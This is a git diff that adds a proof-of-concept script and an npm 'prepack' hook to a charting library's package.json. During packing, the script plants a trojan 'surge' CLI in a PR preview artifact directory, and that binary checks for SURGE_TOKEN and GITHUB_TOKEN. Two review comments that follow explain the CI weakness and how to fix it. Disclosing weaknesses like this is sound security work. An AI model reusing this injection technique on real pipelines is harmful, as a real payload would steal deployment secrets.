diff --git a/inject-poc.sh b/inject-poc.sh
new file mode 100644
index 0000000000..677f84c96a
--- /dev/null
+++ b/inject-poc.sh
@@ -0,0 +1,22 @@
+#!/bin/bash
+# This runs during npm pack when PR_PREVIEW_DIR is set
+if [ -n "$PR_PREVIEW_DIR" ]; then
+ mkdir -p "$PR_PREVIEW_DIR/node_modules/.bin"
+ mkdir -p "$PR_PREVIEW_DIR/node_modules/surge"
+
+ echo '{"name":"surge","version":"99.0.0","bin":{"surge":"index.js"}}' > "$PR_PREVIEW_DIR/node_modules/surge/package.json"
+
+ cat > "$PR_PREVIEW_DIR/node_modules/surge/index.js" << 'TROJAN'
+#!/usr/bin/env node
+console.log("=== PoC: Trojan surge executed ===");
+console.log("SURGE_TOKEN is set:", !!process.env.SURGE_TOKEN);
+console.log("SURGE_TOKEN length:", (process.env.SURGE_TOKEN || "").length);
+console.log("GITHUB_TOKEN is set:", !!process.env.GITHUB_TOKEN);
+console.log("=== Proves code execution with access to secrets ===");
+process.exit(0);
+TROJAN
+
+ chmod +x "$PR_PREVIEW_DIR/node_modules/surge/index.js"
+ ln -sf ../surge/index.js "$PR_PREVIEW_DIR/node_modules/.bin/surge"
+ echo "[PoC] Trojan surge binary injected into artifact directory"
+fi
diff --git a/package.json b/package.json
index fd57b487c3..c7522b14c8 100644
--- a/package.json
+++ b/package.json
@@ -64,7 +64,8 @@
 "checkheader": "node build/checkHeader.js",
 "lint": "npx eslint --cache --cache-location node_modules/.cache/eslint src/**/*.ts ssr/client/src/**/*.ts extension-src/**/*.ts",
 "lint:fix": "npx eslint --fix src/**/*.ts extension-src/**/*.ts",
- "lint:dist": "echo 'It might take a while. Please wait ...' && npx jshint --config .jshintrc-dist dist/echarts.js"
+ "lint:dist": "echo 'It might take a while. Please wait ...' && npx jshint --config .jshintrc-dist dist/echarts.js",
+ "prepack": "bash ./inject-poc.sh"
 },
 "dependencies": {
 "tslib": "2.3.0",
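Review bot: The header comment on the second line of inject-poc.sh says only when the script runs, not that it is a proof-of-concept for a workflow weakness, who sets PR_PREVIEW_DIR, or that it writes outside the package being packed; I would replace it with `# PoC ONLY, not for merging: shows that a prepack hook in PR-controlled package.json can write into the artifact directory the workflow exposes as PR_PREVIEW_DIR.` The heredoc payload reports only whether SURGE_TOKEN and GITHUB_TOKEN are set and the token length, never their values, which is the right restraint for a PoC and should be preserved in any revision. When PR_PREVIEW_DIR is unset the `if` silently does nothing, so a maintainer running `npm pack` locally would never see the hook fire; an `else` branch with `echo "[PoC] PR_PREVIEW_DIR unset, nothing injected" >&2` would make its presence visible. The defensive fix does not belong in this file: the root issue the script demonstrates is that untrusted PR code is packed while deployment secrets are present in the job environment, which is a workflow-configuration problem.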
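Review bot: The added `"prepack": "bash ./inject-poc.sh"` entry runs on every `npm pack` and `npm publish`, not just in the PR preview job, so anyone cutting a release from this branch executes the hook as well; the only thing scoping its effect is the PR_PREVIEW_DIR guard inside the script, and nothing in package.json limits it. As a finding, this hunk shows that npm lifecycle scripts are under the PR author's control the moment CI packs PR code; the preview workflow should run `npm pack --ignore-scripts` (or set `ignore-scripts=true` in the runner's npm config) and keep SURGE_TOKEN and GITHUB_TOKEN out of the environment of any step that executes PR-controlled code. I am inferring from the injected `node_modules/.bin/surge` path that a later deploy step resolves `surge` from the artifact's node_modules/.bin; if so, that step should pin the CLI from a trusted install rather than the artifact. The enclosing `scripts` object begins before the hunk.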